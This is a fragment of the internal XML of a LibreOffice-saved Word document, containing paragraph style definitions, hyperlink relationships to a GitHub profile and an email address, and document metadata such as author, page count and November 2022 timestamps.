      <w:ind w:right="-170" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableText" w:customStyle="1">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-U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github.com/DamBasement" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test@test.com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Application>LibreOffice/7.0.4.2$Linux_X86_64 LibreOffice_project/00$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>7</Pages>
  <Words>622</Words>
  <Characters>4418</Characters>
  <CharactersWithSpaces>5151</CharactersWithSpaces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2022-11-15T17:57:00Z</dcterms:created>
  <dc:creator>Jose RF</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2022-11-15T18:14:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-19T21:50:08Z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